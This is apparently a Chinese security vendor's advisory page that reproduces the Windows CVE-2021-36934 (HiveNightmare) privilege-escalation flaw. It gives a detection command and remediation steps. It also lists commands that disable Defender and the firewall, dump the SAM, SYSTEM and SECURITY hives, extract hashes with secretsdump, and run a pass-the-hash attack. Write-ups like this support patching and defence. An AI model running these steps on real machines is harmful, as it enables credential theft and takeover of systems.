提交需求
*
*

*
*
*
立即提交
点击”立即提交”,表明我理解并同意 《美创科技隐私条款》

logo

    产品与服务
    解决方案
    技术支持
    合作发展
    关于美创

    申请试用
      CVE-2021-36934: Windows特权提升漏洞复现
      发布时间:2021-08-20 阅读次数: 225 次

      漏洞概述


      CVE-2021-36934: Windows特权提升漏洞是由于Windows对多个系统文件(包括安全账户管理器(SAM))的访问控制列表(ACL)过于宽松所导致的特权提升漏洞。成功利用此漏洞的攻击者可以将普通用户权限提升至SYSTEM权限,并在目标机器上执行任意代码,从而达到控制目标系统的目的。但该漏洞需要开启系统保护,并设置系统还原点才可利用。


      影响版本


      Microsoft:Windows10:1809及之后的版本


      漏洞检测方法


      执行以下命令:


      icacls C:windowssystem32configsam


      如果输出BUILTINUsers:(I)(RX) 表示该系统易受攻击。




      如果输出 Accessis denied 或拒绝访问表示该系统不易受攻击。




      漏洞复现


      1)环境配置


      启用administrator用户:net useradministrator /active:yes


      设置密码:net useradministrator 123456


      关闭Defender:


      reg add"HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows Defender" /v"DisableAntiSpyware" /d 1 /t REG_DWORD /f


      关闭防火墙:netsh advfirewallset allprofiles state off


      启用文件和打印机共享服务:net startlanmanserver




      2)创建系统还原点




      3)使用GossiTheDog提供的工具转储SAM,SYSTEM和SECURITY文件。


      工具地址:https://github.com/GossiTheDog/HiveNightmare




      可以看到在低权限账号下,成功利用CVE-2021–36934 读取到了 SAM、SECURITY、SYSTEM 三个文件。


      4)使用impacket-secretsdump工具获取目标用户的Hash 值


      git clonehttps:


      //github.com/SecureAuthCorp/impacket.gitcd impacket/examples


      cd impacket/examples


      python3 secretsdump.py -samSAM-2021-08-11 -system SYSTEM-2021-08-11 -security SECURITY-2021-08-11 LOCAL




      5)使用msf进行哈希传递攻击,利用SMB服务获取目标系统SYSTEM权限。




      6)成功获得system权限




      处置建议


      1)限制外部对%windir%system32config文件的访问:


      1.以管理员权限打开CMD或PowerShell


      2.运行该命令:icacls %windir%system32config*.*/inheritance:e


      2)删除卷影复制服务(VSS)副本:


      1.删除限制访问%windir%system32config之前存在的所有系统还原点和卷影


      2.创建一个新的系统还原点

      免费试用
      服务热线

      马上咨询

      400-811-3777

      回到顶部